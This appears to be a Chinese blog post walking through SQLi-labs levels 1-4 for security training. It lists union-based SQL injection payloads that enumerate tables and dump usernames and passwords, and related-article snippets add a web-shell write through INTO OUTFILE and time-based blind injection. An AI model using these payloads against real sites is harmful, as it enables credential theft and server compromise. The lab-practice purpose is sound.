【Sqli-Labs-Master】Less1-4

最新推荐文章于 2025-06-06 15:34:13 发布
最新推荐文章于 2025-06-06 15:34:13 发布
阅读量557 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: Web 文章标签: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Oavinci/article/details/91047505
本文深入探讨了SQL注入攻击的各种技巧,包括如何利用错误消息、联合查询、字符串拼接等手段来探测数据库结构和内容。通过具体实例,如PHPStudy环境下的SQLi-labs练习,详细解析了不同场景下SQL注入的实施方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

phpstudy2016:链接:http://pan.baidu.com/s/1bpbEBCj 密码:fmr4

sqli-labs-master:链接:http://pan.baidu.com/s/1jH4WlMY 密码:11mj

Less-1

?id=1' 报错

?id=1'%23 返回正常

?id=1' order by 3%23  返回正常

?id=1' order by 4%23  报错,说明表中有三列

?id=-1' union select 1,2,3%23  只有第一句话id=-1为空,才能回显后面的内容。

回显2,3  说明可以利用这两列回显我想要的董西

猜数据库名

?id=-1' union select 1,database(),3%23

猜表名

concat(str1,str2,...)——没有分隔符地连接字符串

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23

或者可以直接

?id=-1' union select 1, group_concat(table_name),3 from information_schema.tables where table_schema=database()

猜列名

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'%23

猜内容

concat_ws(separator,str1,str2,...)——含有分隔符地连接字符串

?id=-1' union select 1,concat_ws('%23',username,password),3 from users limit 0,1%23

后台查看一下源代码:

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

 

Less-2

?id=1 order by 4  报错

?id=1 order by 3  不报错,测试得到三列 

?id=-1 union select 1,2,3%23

后台查看一下源代码:

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; 
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

 

Less-3

单引号加括号闭合

?id=1'  报错

?id=1') %23  成功回显

?id=-1') union select 1,database(),3%23

后台查看一下源代码:

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1"; 
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

 

Less-4

双引号加括号闭合

?id=1'  没有报错

?id=1"  报错

?id=1")%23  成功回显

?id=-1") union select 1,database(),3%23

查看一下源代码:

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1"; 
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

 

SQLI-LABS 01.第一关 【显错注入_单引号闭合】
weixin_45284414的博客
05-15 603
首先主动输入一个单引号提前闭合,最后-- x注释掉后边内容。中间可以构造使用AND OR 拼接语句进行探测。01.第一关 【显错注入_单引号闭合】)利用常规的显错注入去做题。
SQLi-labs-Master1-22)新手通关宝典
Myosotis_LL的博客
05-18 3174
欢迎来到《SQLi-labs-Master新手通关宝典》,本宝典专为网络安全新手编写,旨在引导他们深入了解SQL注入SQLi)这一严重的安全漏洞。SQL注入允许攻击者通过精心构造的输入来操纵数据库查询,从而获取、篡改或删除敏感数据。本篇将带领你从基础知识出发,逐步掌握SQL注入的原理、技术和防御策略。通过SQLi-labs等实验环境,你将有机会在真实场景中实践SQL注入攻击,并学习如何有效防御。无论你是开发人员、系统管理员、渗透测试人员还是网络安全爱好者,掌握SQL注入技术都将对你大有裨益。
SQL注入(字符型,单引号闭合)
weixin_43695031的博客
11-06 8219
SQL注入(字符型,单引号闭合) 1、判断为字符型还是整型,?为连接符 ?id=1 and 1=2 当不报错说明为字符型,反之则是整型 2、构造闭合 ?id=1’and%20 ‘1’='1 说明是单引号闭合则可以用 --+ 来注释掉后面的 ’ 例如:?id=1--+ 也可以用 **?id=1’**来判断,出错了就说明判断对了,因为在源语句中后面多出了一个 ’ ,所以采用上面 –+ 来注释掉后面...
sqli-labs 1 Less-1通关详解
m0_74135202的博客
06-06 304
【代码】sqli-labs 1 Less-1通关详解。
sqli-labs(less-1)
墨鱼菜鸡
09-10 576
目录 less-1(union联合注入) 1.根据注入位置数据类型将sql注入分类(以localhost/sqli-labs/less-1为例子) 2.利用order判断字段数 3.利用union select 联合查询,将id值设置成不成立,即可探测到可利用的字段数 4.利用函数database(),user(),version()可以得到...
单引号报错注入---sqli-labs靶场前瞻
yzl_007的博客
08-22 409
单引号报错注入sqli-labs靶场前瞻 第一关 输入?id=1后正常回显 测试注入点: 构造一下payload:?id=1’or ‘1’='1 正常回显 ?id=1’ and ‘1’ = '2 无回显,由此判断此处存在sql注入漏洞,也可以用sqlmap跑一下如下: 测试指定url是否存在sql注入sqlmap -u http://127.0.0.1/sqli-labs/Less-1/?id=1 前面测得具有回显,sqlmap也表示存在union联合查询 先查找列 ?id=1
sqli-labs-masterLess-1
weixin_44352521的博客
12-04 328
首先在虚拟机中安装好Metasploitable2的靶机,然后查看地址,在浏览器的地址栏中输入:http://192.168.228.129/sqli-labs-master/Less-1/ 这里呢,我们可以先参照源码进行一步步渗透和注入! 可以看到$id是我们要输入的变量 sqli-labs-master/Less-1/ 1. 在地址栏中的URL后输入?id=1 http://192.168...
sqli-labs-master/ Less-1记录
qq_45052704的博客
07-03 962
sqli-labs-master学习记录
网络安全-sqlmap实战之sqlilabs-Less8_sqli-labs-master less-8 select from users where
2401_84254087的博客
05-02 177
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。添加–dbms参数,–technique参数。使用-o参数优化,–batch参数进行跳过。
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1886
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的...
sqlilabs-Less-1
2301_80753596的博客
05-03 607
ok,来到第一关也算是梦开始的地方,引入眼帘的就是请让我们输入一个id那么我们可以在火狐下载一个插件HackBar这样子可以更加方便。
sqli-labs less-1
zbbjya的博客
02-08 532
请输入id作为带数值的参数 ==================================================----------======= 输入 ?id=1 我们会看到这个sql语句是我们添加进去的,原本是应该没有的 limit 0.1;其中第一位是从第几个开始的,比如0代表从第一个开始,而第二位的1代表的就是显示多少个数据 再输入加一个单引号我们会发现报错了 ​ ?id=1' 一个一个的试 127.0.0...
Sqli-labsLess-1
→_→
03-11 1133
我们先来看看这个环境有哪些题: 接下来开始我们的学习之旅吧! Less-1 翻译:GET-基于错误-单引号-字符串 欢迎 Dh...
Sqli-Labsless-1
ISNS的博客
02-03 1884
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 1.进入less-1的题目以后,我们可以看到这道题的提示“请输入ID作为带数值的参数”: 2.我们根据题目提示,尝试在URL中加上“?id=1”、“?id=2”,可以看到看到从数据库中查询到的用于登录login的用户名和密码: 我们要找的是网站后台管理员的用户名和密码,目的是拿到网站的权限,从...
Less-4】双引号报错字符型注入 + 需要闭合“)“
ssrf
10-27 580
目录前言1、测试是否存在注入点 前言 提示:基于错误,单引号,数字型注入,与前两关不同的是需要闭合括号 1、测试是否存在注入点 http://localhost/sqli-labs/Less-4?id=1' 尝试输入双引号 http://localhost/sqli-labs/Less-4?id=1" 源码 $id = '"' . $id . '"'; // 直接将输入的内容两边拼接上双引号 "1" $sql="SELECT * FROM users WHERE id=($id) LIMIT.
Less-3
weixin_30389003的博客
04-03 127
这次我就不打印出查询语句了,这种东西毕竟要多练习。否则以后实战时,谁给你看他的查询语句。下面开始讲解: 首先我搭建了一个本地环境,是模仿第三关来写的,我们先来看一下。先给出源码吧,源码随手写的,有一点烂,不过不影响。 <?php include("sql-inc.php"); $id = $_GET[ 'id' ]; $sql = "select * from users wh...
sqli-labsless1
weixin_44791273的博客
09-10 283
题目提示输入id作为参数数值 浏览器通常使用 ? 来表示GET方法传递参数,而使用POST传递参数是不会显示到URL中的。 首先尝试传递 id=0 传递id=1试一下 发现查询成功,证明1是存在的 下面接着以0为例子 加上 ‘ 来试试 %27 是指 ’ 的编码 发现页面回显且报错 报错信息的最后面的内容:use near ’‘0’‘ LIMIT 0,1’ at line 1 ,仔细观察,我们都知道php的语句如果有 ’ 的话,肯定要有另一个 ‘ 来进行闭合,不然就是不完整的语句。那我们不妨.
sqli-labs-master/Less 合集1
weixin_66503195的博客
07-22 261
用union selct 回显查询位置。使用 ordre by 查询有几列。进入靶场第一关,加参数id。
sqli-labs-master/Less-1/
最新发布
06-25
### SQL注入漏洞的基本原理 SQL注入是一种常见的Web安全漏洞,攻击者通过在输入字段中插入恶意的SQL代码,从而操控后端数据库。这种攻击可以导致数据泄露、数据篡改,甚至完全控制数据库服务器。SQL注入通常发生在应用程序没有正确过滤用户输入的情况下。 ### Less-1 漏洞利用教程 Less-1 是 `sqli-labs-master` 项目中的第一个实验环境,旨在帮助学习者理解和练习SQL注入技术。该实验环境模拟了一个存在SQL注入漏洞的Web应用。 #### 判断注入类型 首先需要确定目标是否存在SQL注入漏洞,并识别其类型(字符型或数字型)。对于Less-1,可以通过尝试添加单引号 (`'`) 到URL参数来触发错误消息,进而判断注入点的存在[^4]。 #### 获取数据库信息 一旦确认存在注入点,下一步是获取数据库的信息,如数据库名称、表名和列名等。这可以通过使用`UNION SELECT`语句结合`group_concat()`函数来实现。例如,通过访问以下链接可以获取用户名和密码: ``` http://127.0.0.1/sqli-labs-php7-master/Less-1/?id=-1'union select 1,2,group_concat(concat_ws('~~',username,password)) from security.users --+ ``` 此请求将返回一个包含所有用户名和密码的字符串,用以展示如何从数据库中提取敏感信息[^3]。 #### 使用布尔盲注 如果直接查询无法获得预期结果,可以采用布尔盲注技术。这种方法依赖于根据查询是否为真来推断数据库的信息。例如,通过发送如下请求来估计当前数据库名称的长度: ``` http://127.0.0.1/sqli-labs-master/Less-9/?id=1' AND IF(LENGTH(database())<10,sleep(1),1) -- a ``` 这里使用了`IF`条件语句配合`SLEEP()`函数,当条件满足时会使服务器延迟响应,以此判断条件真假[^1]。 #### 导入数据库 为了更好地理解和实践这些实验,可能还需要导入预先准备好的数据库结构。可以通过MySQL客户端工具执行SQL文件来完成这一操作: ```bash mysql -u root -p < Less-1/sqlmapless1.sql ``` 这条命令会提示输入密码,之后将指定的SQL文件导入到MySQL数据库中,设置好实验所需的环境[^2]。 ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值